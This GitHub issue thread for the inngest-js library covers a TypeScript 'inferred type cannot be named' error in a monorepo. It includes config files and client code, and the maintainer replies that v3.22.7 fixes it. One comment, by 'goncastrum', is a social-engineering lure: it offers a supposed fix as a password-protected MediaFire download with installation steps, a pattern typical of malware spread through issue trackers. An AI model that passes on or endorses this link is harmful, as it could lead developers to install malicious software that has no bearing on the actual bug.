### ISSUE TITLE
[BUG] The inferred type of 'inngest' cannot be named without a reference to '../../../node_modules/inngest/types'. This is likely not portable. A type annotation is necessary

### ISSUE THREAD

**Issue by harrisrobin** [inngest/inngest-js#695]
**Describe the bug**
In a monorepo similar to [midday's v1](https://github.com/midday-ai/v1), I have a jobs package with inngest (instead of trigger.dev). 

in said package, I have the following tsconfig.json:
```json
{
  "$schema": "https://json.schemastore.org/tsconfig",
  "display": "Default",
  "compilerOptions": {
    "composite": false,
    "declaration": true,
    "declarationMap": true,
    "esModuleInterop": true,
    "forceConsistentCasingInFileNames": true,
    "allowImportingTsExtensions": true,
    "noEmit": true,
    "inlineSources": false,
    "isolatedModules": true,
    "module": "ESNext",
    "moduleResolution": "Bundler",
    "noUnusedLocals": false,
    "noUnusedParameters": false,
    "preserveWatchOutput": true,
    "skipLibCheck": true,
    "strict": true,
    "strictNullChecks": true
  },
  "exclude": ["node_modules"]
}

```

This unfortunately results in the following typescript error:
![CleanShot 2024-09-02 at 01 12 30@2x](https://github.com/user-attachments/assets/7eeac6ad-f691-4cf6-83e8-8a910765f2fb)

Since i do not have composite as true, i don't think this is the same error as #686 . 

**To Reproduce**

1. clone [midday's v1](https://github.com/midday-ai/v1)

2. Add inngest to the jobs package

```json
{
  "name": "@repo/jobs",
  "version": "0.1.0",
  "private": true,
  "scripts": {
    "clean": "rm -rf .turbo node_modules",
    "lint": "biome check .",
    "dev:jobs": "bunx inngest-cli@latest dev",
    "format": "biome format --write .",
    "typecheck": "tsc --noEmit"
  },
  "dependencies": {
    "inngest": "^3.22.6",
    "@repo/supabase": "*"
  }
}
```

```ts
inngest-client.ts
import { EventSchemas, Inngest } from "inngest"

type Events = {
  "auth/schedule-delete": { data: { user: { id: string } } }
}

export const inngest = new Inngest({
  id: "jobs",
  schemas: new EventSchemas().fromRecord<Events>(),
  isDev: process.env.INNGEST_DEV === "1",
  eventKey: process.env.INNGEST_EVENT_KEY,
  signingKey: process.env.INNGEST_SIGNING_KEY,
  env: process.env.VERCEL_GIT_COMMIT_REF,
})

```

3. See typescript error

**Expected behavior**
No Error.

**Code snippets / Logs / Screenshots**
![CleanShot 2024-09-02 at 01 15 07@2x](https://github.com/user-attachments/assets/5ee125f8-6724-444f-a872-a35479e5e730)
![CleanShot 2024-09-02 at 01 15 37@2x](https://github.com/user-attachments/assets/d88ea93d-48b3-4645-b539-ffcd5eb657a4)

**System info (please complete the following information):**

- OS: Mac
- npm package Version: 3.22.6
- Framework: next.js
- Platform: vercel

**Additional context**

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jpwilliams** [comment]
Thanks for the report, @harrisrobin!

Does v3.22.7 fix your issue?

**Comment by harrisrobin** [comment]
yes it did, thanks 🫡

**Comment by goszczynskip** [comment]
I'm seeing the same error in 3.22.9. I've created PR with a fix
